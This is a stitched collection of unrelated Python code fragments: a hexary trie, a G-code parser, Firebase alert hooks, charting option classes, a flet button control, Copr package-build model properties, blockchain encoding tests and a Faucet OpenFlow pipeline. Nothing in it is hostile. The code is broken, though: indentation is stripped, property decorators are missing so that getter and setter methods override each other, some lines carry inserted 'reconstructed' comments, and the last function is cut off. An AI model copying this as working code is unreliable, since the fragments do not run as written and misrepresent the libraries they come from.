new_node = self._set(sub_node, trie_key_remainder, value)
else:
subnode_position = trie_key_remainder[0]
subnode_key = compute_leaf_key(trie_key_remainder[1:])
sub_node = [subnode_key, value]
new_node = (([BLANK_NODE] * 16) + [node[1]])
new_node[subnode_position] = self._persist_node(sub_node)
else:
new_node = ([BLANK_NODE] * 17)
if ((len(current_key_remainder) == 1) and is_extension):
new_node[current_key_remainder[0]] = node[1]
else:
if is_extension:
compute_key_fn = compute_extension_key
else:
compute_key_fn = compute_leaf_key
new_node[current_key_remainder[0]] = self._persist_node([compute_key_fn(current_key_remainder[1:]), node[1]])
if trie_key_remainder:
new_node[trie_key_remainder[0]] = self._persist_node([compute_leaf_key(trie_key_remainder[1:]), value])
else:
new_node[(- 1)] = value
if common_prefix:
new_node_key = self._persist_node(new_node)
return [compute_extension_key(common_prefix), new_node_key]
else:
return new_node
def __getitem__(self, key):
return self.get(key)
def __setitem__(self, key, value):
return self.set(key, value)
def __delitem__(self, key):
return self.delete(key)
def __contains__(self, key):
return self.exists(key)
    @contextmanager
    def squash_changes(self):
scratch_db = ScratchDB(self.db)
with scratch_db.batch_commit(do_deletes=self.is_pruning):
Trie = type(self)
memory_trie = Trie(scratch_db, self.root_hash, prune=True, ref_count=self._ref_count)
(yield memory_trie)
if (self.root_hash != memory_trie.root_hash):
try:
raw_root_node = memory_trie.get_node(memory_trie.root_hash)
except KeyError:
self.root_hash = memory_trie.root_hash
else:
self.root_hash = self._set_raw_node(raw_root_node)
    @contextmanager
    def at_root(self, at_root_hash):
if self.is_pruning:
raise ValidationError('Cannot use trie snapshot while pruning')
snapshot = type(self)(self.db, at_root_hash, prune=False)
(yield snapshot)
def __repr__(self) -> str:
return f'HexaryTrie({self.db!r}, root_hash={self.root_hash}, prune={self.is_pruning})' |
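# Hedged usage sketch for the trie above, using a plain dict as the node
# database; the keys and values are illustrative.
db = {}
trie = HexaryTrie(db)
trie[b'dog'] = b'puppy'
assert trie[b'dog'] == b'puppy'
proof = trie.get_proof(b'dog')
assert HexaryTrie.get_from_proof(trie.root_hash, b'dog', proof) == b'puppy' |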
class gcodeParser(QObject):
sig_log = pyqtSignal(int, str)
def __init__(self):
super().__init__()
    # "@pyqtSlot" prefixes below are reconstructed from "(str)" decorator
    # residue; pyqtSlot matches the PyQt signal machinery used by this class.
    @pyqtSlot(str)
def noComment(self, gcodeLine: str):
line = ''
line_flags = 0
for c in gcodeLine:
if line_flags:
if (c == ')'):
if (line_flags & LINE_FLAG_COMMENT_PARENTHESES):
line_flags &= (~ LINE_FLAG_COMMENT_PARENTHESES)
elif (c <= ' '):
pass
elif (c == '/'):
pass
elif (c == '('):
line_flags |= LINE_FLAG_COMMENT_PARENTHESES
elif (c == ';'):
line_flags |= LINE_FLAG_COMMENT_SEMICOLON
else:
line += c.upper()
return line
    @pyqtSlot(str)
def getMessage(self, gcodeLine: str):
try:
line = re.split('\\( *[Mm][Ss][Gg], *', gcodeLine, 1)[1].split(')')[0].strip()
except:
line = ''
return line
    @pyqtSlot(str)
def wordDict(self, gcodeLine: str):
words = dict()
currentWord = ''
currentValue = ''
for c in self.noComment(gcodeLine):
if (c in VALIDES_GCODE_WORDS):
if (currentWord != ''):
words[currentWord] = currentValue
currentValue = ''
currentWord = c
else:
currentValue += c
words[currentWord] = currentValue
return words
    @pyqtSlot(str)
def wordList(self, gcodeLine: str):
liste = []
currentWord = ''
currentValue = ''
for c in self.noComment(gcodeLine):
if (c in VALIDES_GCODE_WORDS):
if (currentWord != ''):
liste.append((currentWord + currentValue))
currentValue = ''
currentWord = c
else:
currentValue += c
liste.append((currentWord + currentValue))
return liste |
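# Usage sketch for the parser above, assuming VALIDES_GCODE_WORDS contains the
# usual single-letter G-code words (G, M, X, Y, Z, F, ...).
parser = gcodeParser()
assert parser.noComment('G1 X10. Y-2 ; rapid') == 'G1X10.Y-2'
assert parser.wordDict('G1 X10. Y-2') == {'G': '1', 'X': '10.', 'Y': '-2'}
assert parser.getMessage('(MSG, tool change)') == 'tool change' |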
@_util.copy_func_kwargs(AppDistributionOptions)
def on_new_tester_ios_device_published(**kwargs) -> _typing.Callable[([OnNewTesterIosDevicePublishedCallable], OnNewTesterIosDevicePublishedCallable)]:
options = AppDistributionOptions(**kwargs)
def on_new_tester_ios_device_published_inner_decorator(func: OnNewTesterIosDevicePublishedCallable):
        @_functools.wraps(func)
def on_new_tester_ios_device_published_wrapped(raw: _ce.CloudEvent):
from firebase_functions.private._alerts_fn import app_distribution_event_from_ce
func(app_distribution_event_from_ce(raw))
_util.set_func_endpoint_attr(on_new_tester_ios_device_published_wrapped, options._endpoint(func_name=func.__name__, alert_type='appDistribution.newTesterIosDevice'))
return on_new_tester_ios_device_published_wrapped
return on_new_tester_ios_device_published_inner_decorator |
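# Hedged usage sketch: the decorator above registers a Firebase Alerts handler
# for new tester iOS devices; the handler body is illustrative.
@on_new_tester_ios_device_published()
def newtesterdevice(alert):
    # alert is the decoded event built by app_distribution_event_from_ce above
    print(alert.data.payload) |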
class OptionPlotoptionsPackedbubbleSonificationContexttracksMappingNoteduration(Options):
def mapFunction(self):
return self._config_get(None)
def mapFunction(self, value: Any):
self._config(value, js_type=False)
def mapTo(self):
return self._config_get(None)
def mapTo(self, text: str):
self._config(text, js_type=False)
def max(self):
return self._config_get(None)
def max(self, num: float):
self._config(num, js_type=False)
def min(self):
return self._config_get(None)
def min(self, num: float):
self._config(num, js_type=False)
def within(self):
return self._config_get(None)
def within(self, value: Any):
self._config(value, js_type=False) |
class FileInfo(HasPrivateTraits):
file_name = File()
name = Property()
size = Property()
time = Property()
date = Property()
    @cached_property  # "@cached" prefix reconstructed from the "_property" residue
def _get_name(self):
return basename(self.file_name)
    @cached_property
def _get_size(self):
return getsize(self.file_name)
    @cached_property
def _get_time(self):
return strftime('%I:%M:%S %p', localtime(getmtime(self.file_name)))
    @cached_property
def _get_date(self):
return strftime('%m/%d/%Y', localtime(getmtime(self.file_name))) |
class OptionSeriesTilemapDataEvents(Options):
def click(self):
return self._config_get(None)
def click(self, value: Any):
self._config(value, js_type=False)
def drag(self):
return self._config_get(None)
def drag(self, value: Any):
self._config(value, js_type=False)
def dragStart(self):
return self._config_get(None)
def dragStart(self, value: Any):
self._config(value, js_type=False)
def drop(self):
return self._config_get(None)
def drop(self, value: Any):
self._config(value, js_type=False)
def mouseOut(self):
return self._config_get(None)
def mouseOut(self, value: Any):
self._config(value, js_type=False)
def mouseOver(self):
return self._config_get(None)
def mouseOver(self, value: Any):
self._config(value, js_type=False)
def remove(self):
return self._config_get(None)
def remove(self, value: Any):
self._config(value, js_type=False)
def select(self):
return self._config_get(None)
def select(self, value: Any):
self._config(value, js_type=False)
def unselect(self):
return self._config_get(None)
def unselect(self, value: Any):
self._config(value, js_type=False)
def update(self):
return self._config_get(None)
def update(self, value: Any):
self._config(value, js_type=False) |
@click.command('pip', context_settings={'ignore_unknown_options': True, 'help_option_names': []}, help='For pip help use `bench pip help [COMMAND]` or `bench pip [COMMAND] -h`')
@click.argument('args', nargs=(- 1))
@click.pass_context
def pip(ctx, args):
import os
from bench.utils.bench import get_env_cmd
env_py = get_env_cmd('python')
os.execv(env_py, ((env_py, '-m', 'pip') + args)) |
@pytest.mark.parametrize('_input_type, expected_esd_err, message_to_encode', (('Custom type with extra properties in types', {'expected_exception': KeyError, 'match': 'age'}, {'types': {'EIP712Domain': [{'name': 'name', 'type': 'string'}], 'Person': [{'name': 'name', 'type': 'string'}, {'name': 'age', 'type': 'uint256'}]}, 'primaryType': 'Person', 'domain': {'name': 'Name'}, 'message': {'name': 'Bob'}}), ('Atomic type with `None` input', {'expected_exception': ValueError, 'match': 'Missing value for field address of type address'}, {'types': {'EIP712Domain': [{'name': 'name', 'type': 'string'}], 'Person': [{'name': 'name', 'type': 'string'}, {'name': 'address', 'type': 'address'}]}, 'primaryType': 'Person', 'domain': {'name': 'Name'}, 'message': {'name': 'Bob', 'address': None}}), ('Atomic type missing', {'expected_exception': KeyError, 'match': 'address'}, {'types': {'EIP712Domain': [{'name': 'name', 'type': 'string'}], 'Person': [{'name': 'name', 'type': 'string'}, {'name': 'address', 'type': 'address'}]}, 'primaryType': 'Person', 'domain': {'name': 'Name'}, 'message': {'name': 'Bob'}}), ('Dynamic type with `None` input', {'expected_exception': ValueError, 'match': 'Missing value for field motto of type string'}, {'types': {'EIP712Domain': [{'name': 'name', 'type': 'string'}], 'Person': [{'name': 'name', 'type': 'string'}, {'name': 'motto', 'type': 'string'}]}, 'primaryType': 'Person', 'domain': {'name': 'Name'}, 'message': {'name': 'Bob', 'motto': None}}), ('Dynamic type missing', {'expected_exception': KeyError, 'match': 'motto'}, {'types': {'EIP712Domain': [{'name': 'name', 'type': 'string'}], 'Person': [{'name': 'name', 'type': 'string'}, {'name': 'motto', 'type': 'string'}]}, 'primaryType': 'Person', 'domain': {'name': 'Name'}, 'message': {'name': 'Bob'}}), ('Custom type with `None` input', {'expected_exception': ValueError, 'match': 'Missing value for field friend of type Person'}, {'types': {'EIP712Domain': [{'name': 'name', 'type': 'string'}], 'Person': [{'name': 'name', 'type': 'string'}, {'name': 'friend', 'type': 'Person'}]}, 'primaryType': 'Person', 'domain': {'name': 'Name'}, 'message': {'name': 'Bob', 'friend': None}}), ('Custom type missing', {'expected_exception': KeyError, 'match': 'friend'}, {'types': {'EIP712Domain': [{'name': 'name', 'type': 'string'}], 'Person': [{'name': 'name', 'type': 'string'}, {'name': 'friend', 'type': 'Person'}]}, 'primaryType': 'Person', 'domain': {'name': 'Name'}, 'message': {'name': 'Bob'}}), ('Unrecognized primary type', {'expected_exception': ValidationError, 'match': 'The Primary Type `Person` is not present in the `types` attribute'}, {'types': {'EIP712Domain': [{'name': 'name', 'type': 'string'}], 'Human': [{'name': 'name', 'type': 'string'}]}, 'primaryType': 'Person', 'domain': {'name': 'Name'}, 'message': {'name': 'Bob'}})))
def test_encode_structured_data_fail(_input_type, expected_esd_err, message_to_encode):
with pytest.raises(**expected_esd_err):
encode_structured_data(message_to_encode) |
def test_nested_list():
    nested = ((), b'a', (b'b', b'c', b'd'))
    def dec():
        return rlp.decode_lazy(rlp.encode(nested))
    assert isinstance(dec(), Sequence)
    assert (len(dec()) == len(nested))
    assert (evaluate(dec()) == nested)
with pytest.raises(IndexError):
dec()[0][0]
with pytest.raises(IndexError):
dec()[1][1]
with pytest.raises(IndexError):
dec()[2][3]
with pytest.raises(IndexError):
dec()[3] |
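# Sketch of the lazy-decoding behaviour exercised above: children are decoded
# only when accessed, and evaluate() (imported as in the test) forces the
# whole structure back into nested tuples.
lazy = rlp.decode_lazy(rlp.encode((b'a', (b'b', b'c'))))
assert lazy[1][0] == b'b'
assert evaluate(lazy) == (b'a', (b'b', b'c')) |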
class ElevatedButton(ConstrainedControl):
def __init__(self, text: Optional[str]=None, ref: Optional[Ref]=None, key: Optional[str]=None, width: OptionalNumber=None, height: OptionalNumber=None, left: OptionalNumber=None, top: OptionalNumber=None, right: OptionalNumber=None, bottom: OptionalNumber=None, expand: Union[(None, bool, int)]=None, col: Optional[ResponsiveNumber]=None, opacity: OptionalNumber=None, rotate: RotateValue=None, scale: ScaleValue=None, offset: OffsetValue=None, aspect_ratio: OptionalNumber=None, animate_opacity: AnimationValue=None, animate_size: AnimationValue=None, animate_position: AnimationValue=None, animate_rotation: AnimationValue=None, animate_scale: AnimationValue=None, animate_offset: AnimationValue=None, on_animation_end=None, tooltip: Optional[str]=None, visible: Optional[bool]=None, disabled: Optional[bool]=None, data: Any=None, color: Optional[str]=None, bgcolor: Optional[str]=None, elevation: OptionalNumber=None, style: Optional[ButtonStyle]=None, icon: Optional[str]=None, icon_color: Optional[str]=None, content: Optional[Control]=None, autofocus: Optional[bool]=None, url: Optional[str]=None, url_target: Optional[str]=None, on_click=None, on_long_press=None, on_hover=None, on_focus=None, on_blur=None):
ConstrainedControl.__init__(self, ref=ref, key=key, width=width, height=height, left=left, top=top, right=right, bottom=bottom, expand=expand, col=col, opacity=opacity, rotate=rotate, scale=scale, offset=offset, aspect_ratio=aspect_ratio, animate_opacity=animate_opacity, animate_size=animate_size, animate_position=animate_position, animate_rotation=animate_rotation, animate_scale=animate_scale, animate_offset=animate_offset, on_animation_end=on_animation_end, tooltip=tooltip, visible=visible, disabled=disabled, data=data)
self.__color = None
self.__bgcolor = None
self.__elevation = None
self.text = text
self.color = color
self.bgcolor = bgcolor
self.elevation = elevation
self.style = style
self.icon = icon
self.icon_color = icon_color
self.content = content
self.autofocus = autofocus
self.url = url
self.url_target = url_target
self.on_click = on_click
self.on_long_press = on_long_press
self.on_hover = on_hover
self.on_focus = on_focus
self.on_blur = on_blur
def _get_control_name(self):
return 'elevatedbutton'
def _before_build_command(self):
super()._before_build_command()
if ((self.__color is not None) or (self.__bgcolor is not None) or (self.__elevation is not None)):
if (self.__style is None):
self.__style = ButtonStyle()
if ((self.__style.color != self.__color) or self.disabled):
self.__style.color = (self.__color if (not self.disabled) else None)
if ((self.__style.bgcolor != self.__bgcolor) or self.disabled):
self.__style.bgcolor = (self.__bgcolor if (not self.disabled) else None)
if (self.__style.elevation != self.__elevation):
self.__style.elevation = self.__elevation
if (self.__style is not None):
self.__style.side = self._wrap_attr_dict(self.__style.side)
self.__style.shape = self._wrap_attr_dict(self.__style.shape)
self._set_attr_json('style', self.__style)
def _get_children(self):
if (self.__content is None):
return []
self.__content._set_attr_internal('n', 'content')
return [self.__content]
def focus(self):
self._set_attr_json('focus', str(time.time()))
self.update()
async def focus_async(self):
self._set_attr_json('focus', str(time.time()))
(await self.update_async())
    # "@property"/"@x.setter" decorators below are restored; only ".setter"
    # residues survived in this source.
    @property
    def text(self):
        return self._get_attr('text')
    @text.setter
    def text(self, value):
        self._set_attr('text', value)
    @property
    def color(self):
        return self.__color
    @color.setter
    def color(self, value):
        self.__color = value
    @property
    def bgcolor(self):
        return self.__bgcolor
    @bgcolor.setter
    def bgcolor(self, value):
        self.__bgcolor = value
    @property
    def elevation(self) -> OptionalNumber:
        return self.__elevation
    @elevation.setter
    def elevation(self, value: OptionalNumber):
        self.__elevation = value
    @property
    def style(self) -> Optional[ButtonStyle]:
        return self.__style
    @style.setter
    def style(self, value: Optional[ButtonStyle]):
        self.__style = value
    @property
    def icon(self):
        return self._get_attr('icon')
    @icon.setter
    def icon(self, value):
        self._set_attr('icon', value)
    @property
    def icon_color(self):
        return self._get_attr('iconColor')
    @icon_color.setter
    def icon_color(self, value):
        self._set_attr('iconColor', value)
    @property
    def url(self):
        return self._get_attr('url')
    @url.setter
    def url(self, value):
        self._set_attr('url', value)
    @property
    def url_target(self):
        return self._get_attr('urlTarget')
    @url_target.setter
    def url_target(self, value):
        self._set_attr('urlTarget', value)
    @property
    def on_click(self):
        return self._get_event_handler('click')
    @on_click.setter
    def on_click(self, handler):
        self._add_event_handler('click', handler)
    @property
    def on_long_press(self):
        return self._get_event_handler('long_press')
    @on_long_press.setter
    def on_long_press(self, handler):
        self._add_event_handler('long_press', handler)
        self._set_attr('onLongPress', (True if (handler is not None) else None))
    @property
    def content(self) -> Optional[Control]:
        return self.__content
    @content.setter
    def content(self, value: Optional[Control]):
        self.__content = value
    @property
    def autofocus(self) -> Optional[bool]:
        return self._get_attr('autofocus', data_type='bool', def_value=False)
    @autofocus.setter
    def autofocus(self, value: Optional[bool]):
        self._set_attr('autofocus', value)
    @property
    def on_hover(self):
        return self._get_event_handler('hover')
    @on_hover.setter
    def on_hover(self, handler):
        self._add_event_handler('hover', handler)
        self._set_attr('onHover', (True if (handler is not None) else None))
    @property
    def on_focus(self):
        return self._get_event_handler('focus')
    @on_focus.setter
    def on_focus(self, handler):
        self._add_event_handler('focus', handler)
    @property
    def on_blur(self):
        return self._get_event_handler('blur')
    @on_blur.setter
    def on_blur(self, handler):
        self._add_event_handler('blur', handler) |
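# Hedged usage sketch for the control above inside a flet app; the page wiring
# and texts are illustrative.
import flet as ft

def main(page: ft.Page):
    page.add(ElevatedButton(text='Click me', icon='add', on_click=lambda e: print('clicked')))

ft.app(target=main) |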
def _parse_user_flags():
try:
idx = list(sys.argv).index('--user-flags')
user_flags_file = sys.argv[(idx + 1)]
except (ValueError, IndexError):
user_flags_file = ''
if (user_flags_file and os.path.isfile(user_flags_file)):
from ryu.utils import _import_module_file
_import_module_file(user_flags_file) |
def test_capture_serverless_api_gateway_v2(event_api2, context, elasticapm_client):
os.environ['AWS_LAMBDA_FUNCTION_NAME'] = 'test_func'
    @capture_serverless
def test_func(event, context):
with capture_span('test_span'):
time.sleep(0.01)
return {'statusCode': 200, 'headers': {'foo': 'bar'}}
test_func(event_api2, context)
assert (len(elasticapm_client.events[constants.TRANSACTION]) == 1)
transaction = elasticapm_client.events[constants.TRANSACTION][0]
assert (transaction['name'] == 'GET /dev/fetch_all')
assert (transaction['result'] == 'HTTP 2xx')
assert (transaction['span_count']['started'] == 1)
assert (transaction['context']['request']['method'] == 'GET')
assert transaction['context']['request']['headers']
assert (transaction['context']['response']['status_code'] == 200)
assert (transaction['context']['cloud']['origin']['service']['name'] == 'api gateway') |
class Copr(db.Model, helpers.Serializer, CoprSearchRelatedData):
__table__ = outerjoin(_CoprPublic.__table__, _CoprPrivate.__table__)
id = column_property(_CoprPublic.__table__.c.id, _CoprPrivate.__table__.c.copr_id)
user = db.relationship('User', backref=db.backref('coprs'))
group = db.relationship('Group', backref=db.backref('groups'))
mock_chroots = association_proxy('copr_chroots', 'mock_chroot')
forked_from = db.relationship('Copr', remote_side=_CoprPublic.id, foreign_keys=[_CoprPublic.forked_from_id], backref=db.backref('all_forks'))
    # "@property" decorators in this class are restored; the source stripped
    # them, which broke the attribute-style call sites below.
    @property
    def forks(self):
        return [fork for fork in self.all_forks if (not fork.deleted)]
    @property
    def main_dir(self):
        return CoprDir.query.filter((CoprDir.copr_id == self.id)).filter((CoprDir.main == True)).one()
    @property
    def scm_api_auth(self):
        if (not self.scm_api_auth_json):
            return {}
        return json.loads(self.scm_api_auth_json)
    @property
    def is_a_group_project(self):
        return (self.group is not None)
    @property
    def owner(self):
        return (self.group if self.is_a_group_project else self.user)
    @property
    def owner_name(self):
        return (self.group.at_name if self.is_a_group_project else self.user.name)
    @property
    def repos_list(self):
        result = (self.repos or '')
        return result.split()
    @property
    def active_chroots(self):
        return [cc.mock_chroot for cc in self.active_copr_chroots]
    @property
    def enable_permissible_copr_chroots(self):
        permissible_states = [ChrootDeletionStatus('active'), ChrootDeletionStatus('preserved')]
        return [cc for cc in self.copr_chroots if (cc.delete_status in permissible_states)]
    @property
    def enable_permissible_chroots(self):
        return [cc.mock_chroot for cc in self.enable_permissible_copr_chroots]
    @property
    def active_multilib_chroots(self):
chroot_names = [chroot.name for chroot in self.active_chroots]
found_chroots = []
for chroot in self.active_chroots:
if (chroot.arch not in MockChroot.multilib_pairs):
continue
counterpart = '{}-{}-{}'.format(chroot.os_release, chroot.os_version, MockChroot.multilib_pairs[chroot.arch])
if (counterpart in chroot_names):
found_chroots.append(chroot)
return found_chroots
    @property
    def active_copr_chroots(self):
        return [c for c in self.copr_chroots if (c.is_active and (not c.deleted))]
    @property
    def active_chroots_sorted(self):
        return sorted(self.active_chroots, key=(lambda ch: ch.name))
    @property
    def outdated_chroots(self):
        return sorted([chroot for chroot in self.copr_chroots if (chroot.delete_after and (not chroot.deleted))], key=(lambda ch: ch.name))
    @property
    def active_chroots_grouped(self):
        chroots = [('{} {}'.format(c.os_release, c.os_version), c.arch) for c in self.active_chroots_sorted]
        output = []
        for (os, chs) in itertools.groupby(chroots, operator.itemgetter(0)):
            output.append((os, [ch[1] for ch in chs]))
        return output
    @property
    def build_count(self):
        return len(self.builds)
    @property
    def disable_createrepo(self):
        return (not self.auto_createrepo)
    @disable_createrepo.setter
    def disable_createrepo(self, value):
        self.auto_createrepo = (not bool(value))
    @property
    def devel_mode(self):
        return self.disable_createrepo
    @property
    def modified_chroots(self):
modified_chroots = {}
def _set(chroot, attribute, value, check=None):
if ((check is not None) and (not check)):
return
if (not value):
return
if (chroot not in modified_chroots):
modified_chroots[chroot] = {}
modified_chroots[chroot][attribute] = value
for chroot in self.active_copr_chroots:
_set(chroot.name, 'Additional buildroot packages', ', '.join(chroot.buildroot_pkgs_list))
_set(chroot.name, 'Build time repositories', ', '.join(chroot.repos_list))
mock_opts = []
for opt in chroot.with_opts.strip().split():
mock_opts += [('--with ' + opt)]
for opt in chroot.without_opts.strip().split():
mock_opts += [('--without ' + opt)]
_set(chroot.name, 'Mock options', ' '.join(mock_opts))
_set(chroot.name, 'Module setup commands', chroot.module_toggle)
_set(chroot.name, 'Bootstrap overridden as', chroot.bootstrap, chroot.bootstrap_changed)
_set(chroot.name, 'Isolation set to', chroot.isolation, (chroot.isolation and (chroot.isolation != 'unchanged')))
return modified_chroots
def is_release_arch_modified(self, name_release, arch):
return ('{}-{}'.format(name_release, arch) in self.modified_chroots.keys())
    @property
    def full_name(self):
        return '{}/{}'.format(self.owner_name, self.name)
    @property
    def repo_name(self):
        return '{}-{}'.format(self.owner_name, self.main_dir.name)
    @property
    def repo_url(self):
        return '/'.join([app.config['BACKEND_BASE_URL'], u'results', self.full_name])
    @property
    def repo_id(self):
        return '-'.join([self.owner_name.replace('@', 'group_'), self.name])  # the '@' literal was stripped from the original source
    @property
    def modules_url(self):
        return '/'.join([self.repo_url, 'modules'])
def to_dict(self, private=False, show_builds=True, show_chroots=True):
result = {}
for key in ['id', 'name', 'description', 'instructions']:
result[key] = str(copy.copy(getattr(self, key)))
result['owner'] = self.owner_name
return result
    @property
    def still_forking(self):
return bool(Action.query.filter((Action.result == BackendResultEnum('waiting'))).filter((Action.action_type == ActionTypeEnum('fork'))).filter((Action.new_value == self.full_name)).all())
def get_search_related_copr_id(self):
return self.id
    @property
    def enable_net(self):
        return self.build_enable_net
    @enable_net.setter
def enable_net(self, value):
self.build_enable_net = value
def new_webhook_secret(self):
self.webhook_secret = str(uuid.uuid4())
    @property
    def delete_after_days(self):
if (self.delete_after is None):
return None
delta = (self.delete_after - datetime.datetime.now())
return (delta.days if (delta.days > 0) else 0)
    @delete_after_days.setter
def delete_after_days(self, days):
if ((days is None) or (days == (- 1))):
self.delete_after = None
return
delete_after = (datetime.datetime.now() + datetime.timedelta(days=(days + 1)))
delete_after = delete_after.replace(hour=0, minute=0, second=0, microsecond=0)
self.delete_after = delete_after
    @property
    def delete_after_msg(self):
if (self.delete_after_days == 0):
return 'will be deleted ASAP'
return 'will be deleted after {} days'.format(self.delete_after_days)
    @property
    def admin_mails(self):
mails = [self.user.mail]
for perm in self.copr_permissions:
if (perm.copr_admin == helpers.PermissionEnum('approved')):
mails.append(perm.user.mail)
return mails
    @property
    def runtime_deps(self):
dependencies = set()
if self.runtime_dependencies:
for dep in self.runtime_dependencies.split():
if (not dep):
continue
dependencies.add(dep)
return list(dependencies)
@property
def votes(self):
query = db.session.query(CoprScore)
query = query.filter((CoprScore.copr_id == self.id))
return query
@property
def upvotes(self):
return self.votes.filter((CoprScore.score == 1)).count()
@property
def downvotes(self):
return self.votes.filter((CoprScore.score == (- 1))).count()
def score(self):
return sum([self.upvotes, (self.downvotes * (- 1))])
def packit_forge_projects_allowed_list(self):
projects = (self.packit_forge_projects_allowed or '')
return projects.split() |
class QOFPrevalence(models.Model):
pct = models.ForeignKey(PCT, null=True, blank=True, on_delete=models.PROTECT)
practice = models.ForeignKey(Practice, null=True, blank=True, on_delete=models.PROTECT)
start_year = models.IntegerField()
indicator_group = models.CharField(max_length=10)
register_description = models.CharField(max_length=100)
disease_register_size = models.IntegerField() |
def _tuple_forward(layer: Model[(Ragged, Ragged)], X: RaggedData, is_train: bool) -> Tuple[(RaggedData, Callable)]:
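# Adapter in the thinc style: packs the (data, lengths) tuple into a Ragged
# for the wrapped layer, then unpacks both the output and the gradient in
# backprop so the layer composes with tuple-based inputs.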
(Yr, get_dXr) = layer(Ragged(*X), is_train)
def backprop(dY: RaggedData) -> RaggedData:
dXr = get_dXr(Ragged(*dY))
return (dXr.data, dXr.lengths)
return ((Yr.data, Yr.lengths), backprop) |
def extractSoulreaperchroniclesBlogspotCom(item):
(vol, chp, frag, postfix) = extractVolChapterFragmentPostfix(item['title'])
if ((not (chp or vol)) or ('preview' in item['title'].lower())):
return None
tagmap = [('PRC', 'PRC', 'translated'), ('Loiterous', 'Loiterous', 'oel')]
for (tagname, name, tl_type) in tagmap:
if (tagname in item['tags']):
return buildReleaseMessageWithType(item, name, vol, chp, frag=frag, postfix=postfix, tl_type=tl_type)
return False |
class Msg(object):
@staticmethod
def SetWithdrawAddress(request, target, options=(), channel_credentials=None, call_credentials=None, insecure=False, compression=None, wait_for_ready=None, timeout=None, metadata=None):
return grpc.experimental.unary_unary(request, target, '/cosmos.distribution.v1beta1.Msg/SetWithdrawAddress', cosmos_dot_distribution_dot_v1beta1_dot_tx__pb2.MsgSetWithdrawAddress.SerializeToString, cosmos_dot_distribution_dot_v1beta1_dot_tx__pb2.MsgSetWithdrawAddressResponse.FromString, options, channel_credentials, insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def WithdrawDelegatorReward(request, target, options=(), channel_credentials=None, call_credentials=None, insecure=False, compression=None, wait_for_ready=None, timeout=None, metadata=None):
return grpc.experimental.unary_unary(request, target, '/cosmos.distribution.v1beta1.Msg/WithdrawDelegatorReward', cosmos_dot_distribution_dot_v1beta1_dot_tx__pb2.MsgWithdrawDelegatorReward.SerializeToString, cosmos_dot_distribution_dot_v1beta1_dot_tx__pb2.MsgWithdrawDelegatorRewardResponse.FromString, options, channel_credentials, insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def WithdrawValidatorCommission(request, target, options=(), channel_credentials=None, call_credentials=None, insecure=False, compression=None, wait_for_ready=None, timeout=None, metadata=None):
return grpc.experimental.unary_unary(request, target, '/cosmos.distribution.v1beta1.Msg/WithdrawValidatorCommission', cosmos_dot_distribution_dot_v1beta1_dot_tx__pb2.MsgWithdrawValidatorCommission.SerializeToString, cosmos_dot_distribution_dot_v1beta1_dot_tx__pb2.MsgWithdrawValidatorCommissionResponse.FromString, options, channel_credentials, insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def FundCommunityPool(request, target, options=(), channel_credentials=None, call_credentials=None, insecure=False, compression=None, wait_for_ready=None, timeout=None, metadata=None):
return grpc.experimental.unary_unary(request, target, '/cosmos.distribution.v1beta1.Msg/FundCommunityPool', cosmos_dot_distribution_dot_v1beta1_dot_tx__pb2.MsgFundCommunityPool.SerializeToString, cosmos_dot_distribution_dot_v1beta1_dot_tx__pb2.MsgFundCommunityPoolResponse.FromString, options, channel_credentials, insecure, call_credentials, compression, wait_for_ready, timeout, metadata) |
class ValvePipeline(ValveManagerBase):
def __init__(self, dp):
self.dp = dp
self.vlan_table = dp.tables['vlan']
self.classification_table = dp.classification_table()
self.output_table = dp.output_table()
self.egress_table = None
self.egress_acl_table = None
if dp.egress_pipeline:
self.egress_table = dp.tables['egress']
self.egress_acl_table = dp.tables.get('egress_acl')
self.filter_priority = self._FILTER_PRIORITY
self.select_priority = self._HIGH_PRIORITY
@staticmethod
@lru_cache(maxsize=1024)
def _accept_to_table(table, actions):
inst = [table.goto_this()]
if actions:
inst.append(valve_of.apply_actions(actions))
return tuple(inst)
@lru_cache(maxsize=1024)
def accept_to_vlan(self, actions=None):
return self._accept_to_table(self.vlan_table, actions)
@lru_cache(maxsize=1024)
def accept_to_classification(self, actions=None):
return self._accept_to_table(self.classification_table, actions)
@lru_cache(maxsize=1024)
def accept_to_l2_forwarding(self, actions=None):
return self._accept_to_table(self.output_table, actions)
@lru_cache(maxsize=1024)
def accept_to_egress(self, actions=None):
assert (self.egress_table is not None)
return self._accept_to_table(self.egress_table, actions)
def output(self, port, vlan, hairpin=False, external_forwarding_requested=None):
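# With an egress pipeline, encode the output port/VLAN into OpenFlow
# metadata and goto the egress (or egress ACL) table; otherwise apply the
# VLAN's output actions directly against the output table.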
instructions = []
if self.egress_table:
(metadata, metadata_mask) = faucet_md.get_egress_metadata(port.number, vlan.vid)
if self.egress_acl_table:
instructions.extend(valve_of.metadata_goto_table(metadata, metadata_mask, self.egress_acl_table))
else:
instructions.extend(valve_of.metadata_goto_table(metadata, metadata_mask, self.egress_table))
else:
instructions.append(valve_of.apply_actions(vlan.output_port(port, hairpin=hairpin, output_table=self.output_table, external_forwarding_requested=external_forwarding_requested)))
return tuple(instructions)
def initialise_tables(self):
ofmsgs = []
if self.dp.drop_broadcast_source_address:
ofmsgs.extend(self.filter_packets({'eth_src': valve_of.mac.BROADCAST_STR}))
ofmsgs.extend(self.filter_packets({'eth_type': valve_of.ECTP_ETH_TYPE}, priority_offset=10))
return ofmsgs
def _add_egress_table_rule(self, port, vlan, pop_vlan=True):
(metadata, metadata_mask) = faucet_md.get_egress_metadata(port.number, vlan.vid)
actions = copy.copy(port.mirror_actions())
if pop_vlan:
actions.append(valve_of.pop_vlan())
actions.append(valve_of.output_port(port.number))
inst = (valve_of.apply_actions(tuple(actions)),)
return self.egress_table.flowmod(self.egress_table.match(vlan=vlan, metadata=metadata, metadata_mask=metadata_mask), priority=self.dp.high_priority, inst=inst)
def add_port(self, port):
ofmsgs = []
if (self.egress_table is None):
return ofmsgs
for vlan in port.tagged_vlans:
ofmsgs.append(self._add_egress_table_rule(port, vlan, pop_vlan=False))
if (port.native_vlan is not None):
ofmsgs.append(self._add_egress_table_rule(port, port.native_vlan))
return ofmsgs
def del_port(self, port):
ofmsgs = []
if self.egress_table:
mask = faucet_md.PORT_METADATA_MASK
ofmsgs.append(self.egress_table.flowdel(self.egress_table.match(metadata=(port.number & mask), metadata_mask=mask)))
return ofmsgs
def filter_packets(self, match_dict, priority_offset=0):
